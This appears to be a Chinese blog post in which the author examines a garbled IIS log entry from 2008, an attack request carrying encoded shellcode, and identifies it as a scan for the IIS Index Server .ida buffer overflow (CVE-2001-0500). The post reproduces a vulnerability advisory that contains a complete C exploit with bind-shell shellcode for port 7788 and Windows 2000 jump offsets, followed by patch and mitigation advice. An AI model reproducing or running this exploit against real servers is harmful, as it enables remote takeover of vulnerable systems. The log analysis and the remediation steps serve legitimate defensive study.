学了IIS日志后 去看了下网站的日志文件,结果发现有乱码,肯定被人扫描了。
扫描着使用的IP还一直换来换去,辽宁,泰国,韩国。 下面是乱码的日志文件
2008-10-13 02:30:06 59.46.32.130 - 10.4.0.122 80 GET /NULL.IDA
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%
u96d2%u77e5%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙?悙恄?悙愯?
峯饙}-悙悑鱢窰3蒮嬋礄2莫恸$鞜櫃e狿(?絢7_辠檘敐櫃q潤檘讻櫃跍櫃q葲櫃q綒櫃逌櫃q'槞?譁櫃逌櫃q鏇櫃覝櫃q菣櫃q櫃?a欗
y覝櫃蒮+敓櫃逌櫃蒮+敓櫃稖櫃蒮+湙?櫃蒮+湙?櫃櫃?譁櫃蒮+/湙?櫃櫃蒮+O湙橺覝櫃髾髝殬櫃?覝櫃蒮+殶櫃Z敁勿鼢碡祉鲐眄
蚬汐摂擇+櫃檉+&湙?稖櫃q_櫃?af?/櫃?a欗?+++髾櫃神櫇櫃跍櫃?稖櫃蒮+/湙?a櫀櫃欝?櫃?跍櫃?覝櫃蒮+殶櫃af睚++++r
髾駲潤?跍櫃?覝櫃蒮+憻櫃a欗?+++af憩++++狟?櫃噬跍櫃?櫃蒮+5湙?a欗?+++p瞗ff猋裐猋Z狟?經櫃湿B适噬f++湙?a欗?+++經櫃
Z!ffffZ櫃櫃跍櫃^欇櫃櫳f+櫃跍櫃獪櫃谫讠疁櫃凇!槝櫃诘适猋缮少裳缮鞜櫃瑟Y蒮+顪櫃獪櫃蒮+湙?疁櫃蒮+湙?跍櫃
橺駲潤欝賔+9湙橺猋?w洐橿檿櫃櫳獪櫃?稖櫃蒮+艤櫃猋?w洐櫳櫃?疁櫃蒮+艤櫃Z櫃櫃櫃櫃槞櫃?笟櫃^殙櫃櫴蹪櫃噬f+e湙?Aa櫫錏
ZZ墮櫃髪鰵櫃蒮+綗櫃鰵櫃蒮+櫃a欗?+++闀ge4a欗?+++櫏擁i韚?韖Zn4橺櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃跍櫃审沠+€煓欝欝橌沠+p
湙?af?櫃?逌櫃櫃^殬櫃欝澥鬂駀f櫃蒮+櫃a欖?+++鰺櫃轁櫃锜櫃邼櫃af鞏++++q砯ff邼櫃逌櫃髩蹪櫃噬f+i湙?a欖?
+++鬁逌櫃蒮+l湙?a欖?+++逌櫃Z猋Z洐欪櫃櫃櫃櫃櫃櫃!櫃h?≡?欗?+++裷hA辚歫镝歫绻歜讔狵衔?b,翢櫃狿(瀓>頃++++榔^澺{F榔
?S呓歓Hx歑狿?邊歓Xx洑X櫄Z驘櫃Z覠櫃q蓹櫃櫃Z$蕼櫃^蝢稒櫃粕玒狿nHek7?韼++++晌Fq剻櫃?灹揶揶r@?霺Z?櫃蒮娐
Z?$驘櫃噬f幤Z櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃臆俗苷欄朦痖鼨撄硎眸腠扉绪鲐欄朦膂觋貦邗鲫鼨牲坐酎痖
鼨搋鳆仵貊鷻坞痦瘐鼨它唣觞櫴觞櫷麴鼬睃呻鳅隀茚痦婉朦櫃问欔鳅螯頇鼾欟痍睃鳈轫欔龣朦欪貊挈牿櫸
守薯盱闄眈鲫眵鼨眈鲫睇圜鼨挈黻鳅蝣轫櫃櫿鲽瘥滕豚貦撄砩膂朦觋欔?瞑?顧鶦?慶md.exe$ 404 -
对方一直在扫描 IISIndexServerISAPI扩展远程溢出漏洞
漏洞的详细介绍 摘自http://www.xfocus.net/vuls/200106/1099.html
发布时间:2001-06-20
更新时间:2001-06-20
严重程度:高
威胁程度:远程管理员权限
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID:2880
CVE(CAN) ID:CVE-2001-0500
受影响系统
Microsoft IIS 4.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft IIS 5.0
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
详细描述
<*IIS 4.0/5.0 Index Server and Indexing Service ISAPI Extension Buffer Overflow *>
<keyword: ISAPI Extension Buffer Overflow>
微软的INDEX SERVER可以加快WEB的搜索能力,提供对管理员脚本和internet数
据的查询,默认支持管理脚本.ida和查询脚本.idq,不过都是使用idq.dll来进行解析。
不过其存在一个缓冲溢出,其中问题存在于idq.dll扩展程序上,由于没有对用户提交的输入参数据进行边界检查,可以导致远程攻击者利用溢
出获得SYSTEM权利来访问远程系统。
测试代码
如下的请求可以导致EIP地址被覆盖:
GET /NULL.ida?[buffer]=X HTTP/1.1
Host: werd
[buffer]大约是240 bytes.
isno(isno@xfocus.org) 提供了如下测试程序:
//虽然已经有人写过这个东西了,不过我想发布exploit程序最重要的应该是提供
//给大家编程思路,而不仅仅是提供一个攻击工具,所以我把源代码也公布出来。
//by isno<isno@xfocus.org>
#ifndef WIN32
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#else
#pragma comment (lib,"Ws2_32")
#include <windows.h>
#include <winsock.h>
#define close closesocket
#endif
#include <stdio.h>
#define NOP 0x90
#define SP0_JMPEBX "%uac97%u77e4" //jmp ebx in WIN2k+SP0
#define SP1_JMPEBX "%ubf17%u77e4" //jmp ebx in WIN2k+SP1
unsigned char shellcode[]=
//shellcode bind cmd.exe port 7788
"/x90/x55/x8b/xec/x33/xc0/x40/xc1/xe0/x0b/x2b/xe0/xeb/x03/x90/xeb"
"/x05/xe8/xf9/xff/xff/xff/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/xeb/x03/x5d/xeb/x05/xe8/xf8/xff/xff/xff/x83/xc5/x15/x90/x90"
"/x90/x8b/xc5/x33/xc9/x66/xb9/x10/x03/x50/x80/x30/x97/x40/xe2/xfa"
"/x7e/x8e/x95/x97/x97/xcd/x1c/x4d/x14/x7c/x90/xfd/x68/xc4/xf3/x36"
"/x97/x97/x97/x97/xc7/xf3/x1e/xb2/x97/x97/x97/x97/xa4/x4c/x2c/x97"
"/x97/x77/xe0/x7f/x4b/x96/x97/x97/x16/x6c/x97/x97/x68/x28/x98/x14"
"/x59/x96/x97/x97/x16/x54/x97/x97/x96/x97/xf1/x16/xac/xda/xcd/xe2"
"/x70/xa4/x57/x1c/xd4/xab/x94/x54/xf1/x16/xaf/xc7/xd2/xe2/x4e/x14"
"/x57/xef/x1c/xa7/x94/x64/x1c/xd9/x9b/x94/x5c/x16/xae/xdc/xd2/xc5"
"/xd9/xe2/x52/x16/xee/x93/xd2/xdb/xa4/xa5/xe2/x2b/xa4/x68/x1c/xd1"
"/xb7/x94/x54/x1c/x5c/x94/x9f/x16/xae/xd0/xf2/xe3/xc7/xe2/x9e/x16"
"/xee/x93/xe5/xf8/xf4/xd6/xe3/x91/xd0/x14/x57/x93/x7c/x72/x94/x68"
"/x94/x6c/x1c/xc1/xb3/x94/x6d/xa4/x45/xf1/x1c/x80/x1c/x6d/x1c/xd1"
"/x87/xdf/x94/x6f/xa4/x5e/x1c/x58/x94/x5e/x94/x5e/x94/xd9/x8b/x94"
"/x5c/x1c/xae/x94/x6c/x7e/xfe/x96/x97/x97/xc9/x10/x60/x1c/x40/xa4"
"/x57/x60/x47/x1c/x5f/x65/x38/x1e/xa5/x1a/xd5/x9f/xc5/xc7/xc4/x68"
"/x85/xcd/x1e/xd5/x93/x1a/xe5/x82/xc5/xc1/x68/xc5/x93/xcd/xa4/x57"
"/x3b/x13/x57/xe2/x6e/xa4/x5e/x1d/x99/x13/x5e/xe3/x9e/xc5/xc1/xc4"
"/x68/x85/xcd/x3c/x75/x7f/xd1/xc5/xc1/x68/xc5/x93/xcd/x1c/x4f/xa4"
"/x57/x3b/x13/x57/xe2/x6e/xa4/x5e/x1d/x99/x17/x6e/x95/xe3/x9e/xc5"
"/xc1/xc4/x68/x85/xcd/x3c/x75/x70/xa4/x57/xc7/xd7/xc7/xd7/xc7/x68"
"/xc0/x7f/x04/xfd/x87/xc1/xc4/x68/xc0/x7b/xfd/x95/xc4/x68/xc0/x67"
"/xa4/x57/xc0/xc7/x27/x9b/x3c/xcf/x3c/xd7/x3c/xc8/xdf/xc7/xc0/xc1"
"/x3a/xc1/x68/xc0/x57/xdf/xc7/xc0/x3a/xc1/x3a/xc1/x68/xc0/x57/xdf"
"/x27/xd3/x1e/x90/xc0/x68/xc0/x53/xa4/x57/x1c/xd1/x63/x1e/xd0/xab"
"/x1e/xd0/xd7/x1c/x91/x1e/xd0/xaf/xa4/x57/xf1/x2f/x96/x96/x1e/xd0"
"/xbb/xc0/xc0/xa4/x57/xc7/xc7/xc7/xd7/xc7/xdf/xc7/xc7/x3a/xc1/xa4"
"/x57/xc7/x68/xc0/x5f/x68/xe1/x67/x68/xc0/x5b/x68/xe1/x6b/x68/xc0"
"/x5b/xdf/xc7/xc7/xc4/x68/xc0/x63/x1c/x4f/xa4/x57/x23/x93/xc7/x56"
"/x7f/x93/xc7/x68/xc0/x43/x1c/x67/xa4/x57/x1c/x5f/x22/x93/xc7/xc7"
"/xc0/xc6/xc1/x68/xe0/x3f/x68/xc0/x47/x14/xa8/x96/xeb/xb5/xa4/x57"
"/xc7/xc0/x68/xa0/xc1/x68/xe0/x3f/x68/xc0/x4b/x9c/x57/xe3/xb8/xa4"
"/x57/xc7/x68/xa0/xc1/xc4/x68/xc0/x6f/xfd/xc7/x68/xc0/x77/x7c/x5f"
"/xa4/x57/xc7/x23/x93/xc7/xc1/xc4/x68/xc0/x6b/xc0/xa4/x5e/xc6/xc7"
"/xc1/x68/xe0/x3b/x68/xc0/x4f/xfd/xc7/x68/xc0/x77/x7c/x3d/xc7/x68"
"/xc0/x73/x7c/x69/xcf/xc7/x1e/xd5/x65/x54/x1c/xd3/xb3/x9b/x92/x2f"
"/x97/x97/x97/x50/x97/xef/xc1/xa3/x85/xa4/x57/x54/x7c/x7b/x7f/x75"
"/x6a/x68/x68/x7f/x05/x69/x68/x68/xdc/xc1/x70/xe0/xb4/x17/x70/xe0"
"/xdb/xf8/xf6/xf3/xdb/xfe/xf5/xe5/xf6/xe5/xee/xd6/x97/xdc/xd2/xc5"
"/xd9/xd2/xdb/xa4/xa5/x97/xd4/xe5/xf2/xf6/xe3/xf2/xc7/xfe/xe7/xf2"
"/x97/xd0/xf2/xe3/xc4/xe3/xf6/xe5/xe3/xe2/xe7/xde/xf9/xf1/xf8/xd6"
"/x97/xd4/xe5/xf2/xf6/xe3/xf2/xc7/xe5/xf8/xf4/xf2/xe4/xe4/xd6/x97"
"/xd4/xfb/xf8/xe4/xf2/xdf/xf6/xf9/xf3/xfb/xf2/x97/xc7/xf2/xf2/xfc"
"/xd9/xf6/xfa/xf2/xf3/xc7/xfe/xe7/xf2/x97/xd0/xfb/xf8/xf5/xf6/xfb"
"/xd6/xfb/xfb/xf8/xf4/x97/xc0/xe5/xfe/xe3/xf2/xd1/xfe/xfb/xf2/x97"
"/xc5/xf2/xf6/xf3/xd1/xfe/xfb/xf2/x97/xc4/xfb/xf2/xf2/xe7/x97/xd2"
"/xef/xfe/xe3/xc7/xe5/xf8/xf4/xf2/xe4/xe4/x97/x97/xc0/xc4/xd8/xd4"
"/xdc/xa4/xa5/x97/xe4/xf8/xf4/xfc/xf2/xe3/x97/xf5/xfe/xf9/xf3/x97"
"/xfb/xfe/xe4/xe3/xf2/xf9/x97/xf6/xf4/xf4/xf2/xe7/xe3/x97/xe4/xf2"
"/xf9/xf3/x97/xe5/xf2/xf4/xe1/x97/x95/x97/x89/xfb/x97/x97/x97/x97"
"/x97/x97/x97/x97/x97/x97/x97/x97/xf4/xfa/xf3/xb9/xf2/xef/xf2/x97"
"/x68/x68/x68/x68";
unsigned char jump[]=
"%u08eb%u9090";
//jmp 0x08
unsigned char jump_to_shell[]=
"%u9090%uc033%ub866%u031f%u0340%u8bd8%u8b03"
"%u6840%udb33%u30b3%uc303%ue0ff";
//jmp dword ptr [[[ebx+0x320]+0x68]+0x30]
int main(int argc,char *argv[])
{
int s,sp;
char *p,shell_buf[4096],jmp_buf[4096],buf[4096];
struct hostent *he;
struct sockaddr_in sin;
#ifdef WIN32
WSADATA WSAData;
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf("WSAStartup failed./n");
WSACleanup();
exit(1);
}
#endif
if(argc!=3)
{
printf("Usage: %s host sp/n",argv[0]);
return -1;
}
sp=atoi(argv[2]);
memset(shell_buf,NOP,sizeof(shell_buf));
memcpy(&shell_buf[16],shellcode,strlen(shellcode));
shell_buf[strlen(shellcode)+16] = 0;
memset(jmp_buf,1,sizeof(jmp_buf));
p = &jmp_buf[232];
sprintf(p,"%s",jump);
p += strlen(jump);
if(sp==1)
{
sprintf(p,"%s",SP1_JMPEBX);
p += strlen(SP1_JMPEBX);
}
else
{
sprintf(p,"%s",SP0_JMPEBX);
p += strlen(SP0_JMPEBX);
}
sprintf(p,"%s",jump_to_shell);
p += strlen(jump_to_shell);
p = 0;
sprintf(buf,"GET /null.ida?%s=x HTTP/1.0/r/nShell: %s/r/n/r/n",jmp_buf,shell_buf);
if((he = gethostbyname(argv[1])) == 0)
{
printf("Unable to resolve host %s/n",argv[1]);
exit(1);
}
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)he->h_addr);
sin.sin_port = htons(80);
if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Unable to set up socket/n");
exit(1);
}
if((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1)
{
printf("Unable to connect/n");
exit(1);
}
else
printf("Connected.../n");
if(send(s, buf, strlen(buf), 0) == -1)
{
printf("Unable to send/n");
exit(1);
}
else
printf("code sented.../n");
#ifdef WIN32
Sleep(1000);
#else
sleep(1);
#endif
close(s);
printf("Done./n");
return 0;
}
解决方案
注意:
1、安装了Index Server 或 Index Services,但是没有安装 IIS 的系统无此漏洞
2、即使 Index Server/Indexing Service 没有开启,但是只要对 .idq 或 .ida 文件的脚本映射存在,攻击者也能利用此漏洞。
1,请您下载安装补丁:
Windows NT 4.0:
MS 下载:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833
Windows 2000 Professional, Server and Advanced Server:
MS 下载:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800
Windows XP beta:
在下个 BETA 版本会得到解决。
2,删除对 .idq 和 .ida 的脚本映射。
注意:如果其它系统组件被增删,有可能导致该映射被重新自动安装。